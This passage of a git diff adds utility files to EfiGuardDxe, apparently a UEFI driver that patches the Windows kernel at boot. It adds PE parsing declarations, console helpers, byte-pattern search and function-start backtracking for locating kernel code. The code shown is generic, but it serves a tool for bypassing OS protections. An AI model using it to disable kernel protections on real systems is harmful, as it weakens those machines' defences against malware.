BIND) + // O.W. date/time stamp of DLL bound to (Old BIND) + + UINT32 ForwarderChain; // -1 if no forwarders + UINT32 Name; + UINT32 FirstThunk; // RVA to IAT (if bound this IAT has actual addresses) +} IMAGE_IMPORT_DESCRIPTOR, *PIMAGE_IMPORT_DESCRIPTOR; + +#pragma pack(pop) // Revert to original packing + + +// +// Version info data +// +typedef struct _VS_FIXEDFILEINFO +{ + UINT32 dwSignature; // 0xFEEF04BD + UINT32 dwStrucVersion; + UINT32 dwFileVersionMS; + UINT32 dwFileVersionLS; + UINT32 dwProductVersionMS; + UINT32 dwProductVersionLS; + UINT32 dwFileFlagsMask; + UINT32 dwFileFlags; + UINT32 dwFileOS; + UINT32 dwFileType; + UINT32 dwFileSubtype; + UINT32 dwFileDateMS; + UINT32 dwFileDateLS; +} VS_FIXEDFILEINFO; + +// +// Raw version info data as it appears in a PE file resource directory +// This struct is not in any SDK headers, not because it is super secret, but because MS +// is ashamed of it: https://docs.microsoft.com/en-gb/windows/desktop/menurc/vs-versioninfo +// +typedef struct _VS_VERSIONINFO +{ + UINT16 TotalSize; + UINT16 DataSize; + UINT16 Type; + CHAR16 Name[sizeof(L"VS_VERSION_INFO") / sizeof(CHAR16)]; // Size includes null terminator + VS_FIXEDFILEINFO FixedFileInfo; + // Omitted: padding fields that do not contribute to TotalSize +} VS_VERSIONINFO, *PVS_VERSIONINFO; + + +// +// Function declarations +// +PEFI_IMAGE_NT_HEADERS +EFIAPI +RtlpImageNtHeaderEx( + IN VOID* Base, + IN UINTN Size OPTIONAL + ); + +INPUT_FILETYPE +EFIAPI +GetInputFileType( + IN UINT8 *ImageBase, + IN UINTN ImageSize + ); + +CONST CHAR16* +EFIAPI +FileTypeToString( + IN INPUT_FILETYPE FileType + ); + +VOID* +EFIAPI +GetProcedureAddress( + IN UINTN DllBase, + IN PEFI_IMAGE_NT_HEADERS NtHeaders, + IN CHAR8* RoutineName + ); + +EFI_STATUS +EFIAPI +FindIATAddressForImport( + IN VOID* ImageBase, + IN PEFI_IMAGE_NT_HEADERS NtHeaders, + IN CONST CHAR8* ImportDllName, + IN CONST CHAR8* FunctionName, + OUT VOID **FunctionIATAddress + ); + +UINT32 +EFIAPI +RvaToOffset( + IN PEFI_IMAGE_NT_HEADERS NtHeaders, + IN UINT32 Rva + ); + +VOID* +EFIAPI +RtlpImageDirectoryEntryToDataEx( + IN VOID* Base, + IN BOOLEAN MappedAsImage, + IN UINT16 DirectoryEntry, + OUT UINT32 *Size + ); + +EFI_STATUS +EFIAPI +FindResourceDataById( + IN VOID* ImageBase, + IN UINT16 TypeId, + IN UINT16 NameId, + IN UINT16 LanguageId OPTIONAL, + OUT VOID** ResourceData OPTIONAL, + OUT UINT32* ResourceSize + ); + +EFI_STATUS +EFIAPI +GetPeFileVersionInfo( + IN VOID* ImageBase, + OUT UINT16* MajorVersion OPTIONAL, + OUT UINT16* MinorVersion OPTIONAL, + OUT UINT16* BuildNumber OPTIONAL, + OUT UINT16* Revision OPTIONAL, + OUT UINT32* FileFlags OPTIONAL + ); diff --git a/EfiGuardDxe/util.c b/EfiGuardDxe/util.c new file mode 100644 index 0000000..861c81d --- /dev/null +++ b/EfiGuardDxe/util.c @@ -0,0 +1,380 @@ +#include "EfiGuardDxe.h" +#include "util.h" + +#include <Library/UefiLib.h> +#include <Library/DevicePathLib.h> +#include <Library/PrintLib.h> +#include <Library/UefiBootServicesTableLib.h> + +#ifndef ZYDIS_DISABLE_FORMATTER + +#include <Library/PrintLib.h> +#include <Zycore/Format.h> + +STATIC ZydisFormatterFunc DefaultInstructionFormatter; + +#endif + +// +// When debugging, we can choose between poor debugging facilities (VirtualBox) or poor performance and Windows compatibility (QEMU). +// (I guess there is also the closed source thing with the horrible user interface that installs 50 drivers on the host (VMware)) +// This is a bandaid to make Print() calls readable ...for a while... when using VirtualBox or a live machine with no debugger +// +EFI_STATUS +EFIAPI +RtlSleep( + IN UINTN Milliseconds + ) +{ + ASSERT(gBS != NULL); + ASSERT(gBS->Stall != NULL); + + return gBS->Stall(Milliseconds * 1000); +} + +VOID +EFIAPI +PrintLoadedImageInfo( + IN EFI_LOADED_IMAGE *ImageInfo + ) +{ + CHAR16* PathString = ConvertDevicePathToText(ImageInfo->FilePath, TRUE, TRUE); + Print(L"\r\n[+] %s\r\n", PathString); + Print(L" -> ImageBase = %llx\r\n", ImageInfo->ImageBase); + Print(L" -> ImageSize = %llx\r\n", ImageInfo->ImageSize); + if (PathString != NULL) + FreePool(PathString); +} + +VOID +EFIAPI +AppendKernelPatchMessage( + IN CONST CHAR16 *Format, + ... + ) +{ + ASSERT(gKernelPatchInfo.BufferSize % sizeof(CHAR16) == 0); + ASSERT(gKernelPatchInfo.BufferSize < sizeof(gKernelPatchInfo.Buffer)); + + VA_LIST VaList; + VA_START(VaList, Format); + CONST UINTN NumCharsPrinted = UnicodeVSPrint(gKernelPatchInfo.Buffer + (gKernelPatchInfo.BufferSize / sizeof(CHAR16)), + sizeof(gKernelPatchInfo.Buffer) - gKernelPatchInfo.BufferSize, + Format, + VaList); + VA_END(VaList); + + ASSERT(gKernelPatchInfo.BufferSize + (NumCharsPrinted * sizeof(CHAR16)) < sizeof(gKernelPatchInfo.Buffer)); + gKernelPatchInfo.BufferSize += (NumCharsPrinted * sizeof(CHAR16)); + + // Paranoid null terminator (UnicodeVSPrint should do this) + *(CHAR16*)(gKernelPatchInfo.Buffer + (gKernelPatchInfo.BufferSize / sizeof(CHAR16))) = CHAR_NULL; + + // Separate the next message using the null terminator. This is because most Print() implementations crap out + // after ~4 lines (depending on PCDs), so we will print the final buffer using multiple calls to Print() + gKernelPatchInfo.BufferSize += sizeof(CHAR16); +} + +VOID +EFIAPI +PrintKernelPatchInfo( + ) +{ + ASSERT(gST->ConOut != NULL); + + UINTN NumChars = gKernelPatchInfo.BufferSize / sizeof(CHAR16); + if (NumChars * sizeof(CHAR16) >= sizeof(gKernelPatchInfo.Buffer) - sizeof(CHAR16)) + NumChars = sizeof(gKernelPatchInfo.Buffer) - (2 * sizeof(CHAR16)); // Avoid buffer overrun + + CHAR16* String = gKernelPatchInfo.Buffer; + String[NumChars] = String[NumChars + 1] = CHAR_NULL; // Ensure we have a double null terminator at the end + UINTN Length; + + // A double null terminator marks the end. It's just like that lovely Win32 getenv API that makes me want to kill myself every time I see it + while ((Length = StrLen(String)) != 0) + { + gST->ConOut->OutputString(gST->ConOut, String); + String += Length + 1; + } +} + +BOOLEAN +EFIAPI +WaitForKey( + ) +{ + // Hack: because we call this at TPL_NOTIFY in ExitBootServices, we cannot use WaitForEvent() + // in that scenario because it requires TPL == TPL_APPLICATION. So check the TPL + CONST EFI_TPL Tpl = EfiGetCurrentTpl(); + + EFI_INPUT_KEY Key = { 0, 0 }; + EFI_STATUS Status = EFI_NOT_READY; + + while (Status == EFI_NOT_READY) + { + // Can we call WaitForEvent()? + UINTN Index = 0; + if (Tpl == TPL_APPLICATION) + gBS->WaitForEvent(1, &gST->ConIn->WaitForKey, &Index); // Yep + else + RtlSleep(1); // Nope; burn CPU. // TODO: find a way to parallelize this to achieve GeForce FX 5800 temperatures + + // At TPL_APPLICATION, we will always get EFI_SUCCESS (barring hardware failures). At higher TPLs we may also get EFI_NOT_READY + Status = gST->ConIn->ReadKeyStroke(gST->ConIn, &Key); + } + + ASSERT_EFI_ERROR(Status); + return (BOOLEAN)(Key.ScanCode != SCAN_ESC); +} + +INT32 +EFIAPI +SetConsoleTextColour( + IN UINTN TextColour, + IN BOOLEAN ClearScreen + ) +{ + CONST INT32 OriginalAttribute = gST->ConOut->Mode->Attribute; + CONST UINTN BackgroundColour = (UINTN)((OriginalAttribute >> 4) & 0x7); + + gST->ConOut->SetAttribute(gST->ConOut, (TextColour | BackgroundColour)); + if (ClearScreen) + gST->ConOut->ClearScreen(gST->ConOut); + + return OriginalAttribute; +} + +// TODO: #ifdef EFI_DEBUG, this should keep a match count and continue until the end of the buffer, then ASSERT(MatchCount == 1) +EFI_STATUS +EFIAPI +FindPattern( + IN CONST UINT8* Pattern, + IN UINT8 Wildcard, + IN UINT32 PatternLength, + IN VOID* Base, + IN UINT32 Size, + OUT VOID **Found + ) +{ + if (Found == NULL || Pattern == NULL || Base == NULL) + return EFI_INVALID_PARAMETER; + + *Found = NULL; + + for (UINT8 *Address = (UINT8*)Base; Address < (UINT8*)((UINTN)Base + Size - PatternLength); ++Address) + { + UINT32 i; + for (i = 0; i < PatternLength; ++i) + { + if (Pattern[i] != Wildcard && (*(Address + i) != Pattern[i])) + break; + } + + if (i == PatternLength) + { + *Found = (VOID*)Address; + return EFI_SUCCESS; + } + } + + return EFI_NOT_FOUND; +} + +// For debugging non-working signatures. Not that I would ever need to do such a thing of course. Ha ha... ha +// TODO: #ifdef EFI_DEBUG, this should keep a match count and continue until the end of the buffer, then ASSERT(MatchCount == 1) +EFI_STATUS +EFIAPI +FindPatternVerbose( + IN CONST UINT8* Pattern, + IN UINT8 Wildcard, + IN UINT32 PatternLength, + IN VOID* Base, + IN UINT32 Size, + OUT VOID **Found + ) +{ + if (Found == NULL || Pattern == NULL || Base == NULL) + return EFI_INVALID_PARAMETER; + + *Found = NULL; + + CONST UINTN Start = (UINTN)Base; + CONST UINTN End = Start + Size - PatternLength; + EFI_STATUS Status = EFI_NOT_FOUND; + + UINT32 Max = 0; + UINT8 *AddrOfMax = NULL; + + for (UINT8 *Address = (UINT8*)Start; Address < (UINT8*)End; ++Address) + { + UINT32 i; + for (i = 0; i < PatternLength; ++i) + { + if (Pattern[i] != Wildcard && (*(Address + i) != Pattern[i])) + break; + } + + if (i > Max) + { + Max = i; + AddrOfMax = Address; + } + + if (i == PatternLength) + { + *Found = (VOID*)Address; + Status = EFI_SUCCESS; + } + } + + Print(L"\r\nBest match: %lu/%lu matched at 0x%p\r\n", Max, PatternLength, (VOID*)AddrOfMax); + + for (UINT32 i = 0; i < PatternLength && AddrOfMax != NULL; ++i) + { + if (Pattern[i] != Wildcard && (*(AddrOfMax + i) != Pattern[i])) + Print(L"[%lu] [X] %02X != %02X\r\n", i, (*(AddrOfMax + i)), Pattern[i]); // Mismatch + else if (Pattern[i] == Wildcard) + Print(L"[%lu] [ ] %02X\r\n", i, (*(AddrOfMax + i))); // Matched wildcard byte + else + Print(L"[%lu] [v] %02X\r\n", i, Pattern[i]); // Matched exact byte + } + + return Status; +} + +#ifndef ZYDIS_DISABLE_FORMATTER + +// Formatter hook to prefix the opcode bytes to the output +STATIC +ZyanStatus +ZydisInstructionBytesFormatter( + IN CONST ZydisFormatter* Formatter, + IN OUT ZydisFormatterBuffer* Buffer, + IN ZydisFormatterContext* Context + ) +{ + CONST ZyanU8 MaxOpcodeBytes = 12; // Print at most 10 bytes (so 20 characters), with room for ellip.. ses + + ZyanString *String; + ZYAN_CHECK(ZydisFormatterBufferGetString(Buffer, &String)); + + // We cannot use ZyanStringAppendFormat() because at the moment it may use dynamic memory allocation + // to resize the string buffer, with no way to disable this behaviour. Therefore call AsciiSPrint + for (ZyanU8 i = 0; i < MaxOpcodeBytes; ++i) + { + CONST ZyanUSize Length = String->vector.size; + UINTN N; + + if (i < Context->instruction->length && i < MaxOpcodeBytes - 2) + { + // Print one byte of the instruction + N = AsciiSPrint((CHAR8*)(String->vector.data) + Length - 1, + String->vector.capacity - Length + 1, + "%02X", + *(UINT8*)(Context->runtime_address + i)); + } + else if (i < Context->instruction->length && i == MaxOpcodeBytes - 2) + { + // This is a huge instruction; truncate remaining bytes with ellipses + N = AsciiSPrint((CHAR8*)(String->vector.data) + Length - 1, + String->vector.capacity - Length + 1, + "%a", + ".. "); + } + else + { + // Print an empty string for alignment padding + N = AsciiSPrint((CHAR8*)(String->vector.data) + Length - 1, + String->vector.capacity - Length + 1, + "%a", + " "); + } + + // Do bounds check. According to docs, an ASSERT() should have already happened + // if we went OOB, but debug asserts may be disabled on this platform + if ((INTN)N < 0 || N > (UINTN)(String->vector.capacity - Length)) + return ZYAN_STATUS_FAILED; + + String->vector.size += (ZyanUSize)N; + } + + // Call the default formatter to print the actual instruction text + return DefaultInstructionFormatter(Formatter, Buffer, Context); +} + +#endif + +ZyanStatus +EFIAPI +ZydisInit( + IN PEFI_IMAGE_NT_HEADERS NtHeaders, + OUT ZydisDecoder *Decoder, + OUT ZydisFormatter *Formatter OPTIONAL + ) +{ + ZyanStatus Status; + if (!ZYAN_SUCCESS((Status = ZydisDecoderInit(Decoder, + IMAGE64(NtHeaders) ? ZYDIS_MACHINE_MODE_LONG_64 : ZYDIS_MACHINE_MODE_LONG_COMPAT_32, + IMAGE64(NtHeaders) ? ZYDIS_ADDRESS_WIDTH_64 : ZYDIS_ADDRESS_WIDTH_32)))) + return Status; + +#ifdef ZYDIS_DISABLE_FORMATTER + ASSERT(Formatter == NULL); +#else + if (!ZYAN_SUCCESS((Status = ZydisFormatterInit(Formatter, ZYDIS_FORMATTER_STYLE_INTEL)))) + return Status; + if (!ZYAN_SUCCESS((Status = ZydisFormatterSetProperty(Formatter, ZYDIS_FORMATTER_PROP_FORCE_SIZE, ZYAN_TRUE)))) + return Status; + + DefaultInstructionFormatter = (ZydisFormatterFunc)&ZydisInstructionBytesFormatter; + if (!ZYAN_SUCCESS((Status = ZydisFormatterSetHook(Formatter, + ZYDIS_FORMATTER_FUNC_FORMAT_INSTRUCTION, + (CONST VOID**)&DefaultInstructionFormatter)))) + return Status; +#endif + + return ZYAN_STATUS_SUCCESS; +} + +UINT8* +EFIAPI +BacktrackToFunctionStart( + IN CONST UINT8* StartAddress, + IN CONST UINT8* LowerBound + ) +{ + // Test for null. This allows callers to do 'FindPattern(..., &Address); X = Backtrack(Address, ...)' with a single failure branch + if (StartAddress == NULL) + return NULL; + + ASSERT(StartAddress > LowerBound); + + UINT8 *Address; + BOOLEAN Found = FALSE; + for (Address = (UINT8*)StartAddress; Address >= LowerBound; --Address) + { + if ((*(Address - 1) == 0xCC || // Previous byte is int 3 padding, or + (*(Address - 2) == 0x90 && *(Address - 1) == 0x90) || // Previous 2 bytes are nop padding, or + (*(Address - 4) == 0x00 && *(Address - 3) == 0x00 && // Previous 4+ bytes are 00 padding (rare, only happens at start of a section), or + *(Address - 2) == 0x00 && *(Address - 1) == 0x00) || + (*(Address - 1) == 0xC3 && *(Address - 3) != 0x8D) // Previous byte is 'ret', or +#if defined(MDE_CPU_IA32) || defined(_M_IX86) + || (*(Address - 3) == 0xC2 && *(Address - 1) == 0x00) // Previous 3 bytes are 'ret XX' (x86) +#endif + ) + && // *and* + (*Address == 0x40 || *Address == 0x55 || // Current byte is either 'push [ebp|ebx|rbp|rbx]', 'mov REG, XX' or 'sub REG, XX' + (Address < StartAddress && *Address == 0x44 && *(Address + 1) == 0x89) || + (Address < StartAddress && *Address == 0x48 && *(Address + 1) == 0x83) || + (Address < StartAddress && *Address == 0x48 && *(Address + 1) == 0x89) || + (Address < StartAddress && *Address == 0x48 && *(Address + 1) == 0x8B) || + (Address < StartAddress && *Address == 0x49 && *(Address + 1) == 0x89) || + (Address < StartAddress && *Address == 0x4C && *(Address + 1) == 0x8B))) + { + Found = TRUE; + break; + } + } + + return Found ? Address : NULL; +} diff --git a/EfiGuardDxe/util.h b/EfiGuardDxe/util.h new file mode 100644 index 0000000..b42766d --- /dev/null +++ b/EfiGuardDxe/util.h @@ -0,0 +1,120 @@ +#pragma once + +#include "EfiGuardDxe.h" + +#include <Protocol/LoadedImage.h> + +// +// Stalls CPU for N milliseconds +// +EFI_STATUS +EFIAPI +RtlSleep( + IN UINTN Milliseconds + ); + +// +// Prints info about a loaded image +// +VOID +EFIAPI +PrintLoadedImageInfo( + IN EFI_LOADED_IMAGE *ImageInfo + ); + +// +// Similar to Print(), but for use during the kernel patching phase. +// Do not call this unless the message is specifically intended for (delayed) display output only. +// Instead use the PRINT_KERNEL_PATCH_MSG() macro so the boot debugger receives messages with no delay. +// +VOID +EFIAPI +AppendKernelPatchMessage( + IN CONST CHAR16 *Format, + ... + ); + +// +// Prints the contents of the kernel patch string buffer to the screen using OutputString() calls. +// This is a separate function because the buffer consists of zero or more null-terminated strings, +// which are printed sequentially to prevent issues with platforms that have small Print() buffer limits +// +VOID +EFIAPI +PrintKernelPatchInfo( + ); + +// +// Waits for a key to be pressed before continuing execution. +// Returns FALSE if ESC was pressed to abort, TRUE otherwise. +// +BOOLEAN +EFIAPI +WaitForKey( + ); + +// +// Sets the foreground colour while preserving the background colour and optionally clears the screen. +// Returns the original console mode attribute. +// +INT32 +EFIAPI +SetConsoleTextColour( + IN UINTN TextColour, + IN BOOLEAN ClearScreen + ); + +// +// Finds a byte pattern starting at the specified address +// +EFI_STATUS +EFIAPI +FindPattern( + IN CONST UINT8* Pattern, + IN UINT8 Wildcard, + IN UINT32 PatternLength, + IN VOID* Base, + IN UINT32 Size, + OUT VOID **Found + ); + +// +// Finds a byte pattern starting at the specified address (with lots of debug spew) +// +EFI_STATUS +EFIAPI +FindPatternVerbose( + IN CONST UINT8* Pattern, + IN UINT8 Wildcard, + IN UINT32 PatternLength, + IN VOID* Base, + IN UINT32 Size, + OUT VOID **Found + ); + +typedef struct ZydisFormatter_ ZydisFormatter; + +// +// Initializes a ZydisDecoder instance. +// If ZYDIS_DISABLE_FORMATTER is defined, Formatter must be NULL. +// Otherwise it is a required argument. +// +ZyanStatus +EFIAPI +ZydisInit( + IN PEFI_IMAGE_NT_HEADERS NtHeaders, + OUT ZydisDecoder *Decoder, + OUT ZydisFormatter *Formatter OPTIONAL + ); + +// +// Finds the start of a function given an address within it, scanning downwards. +// Returns NULL if StartAddress is NULL (this simplifies error checking logic in calling functions). +// Returns NULL is LowerBound is reached and no function boundary was found. +// +UINT8* +EFIAPI +BacktrackToFunctionStart( + IN CONST UINT8* StartAddress, + IN CONST UINT8* LowerBound + ); |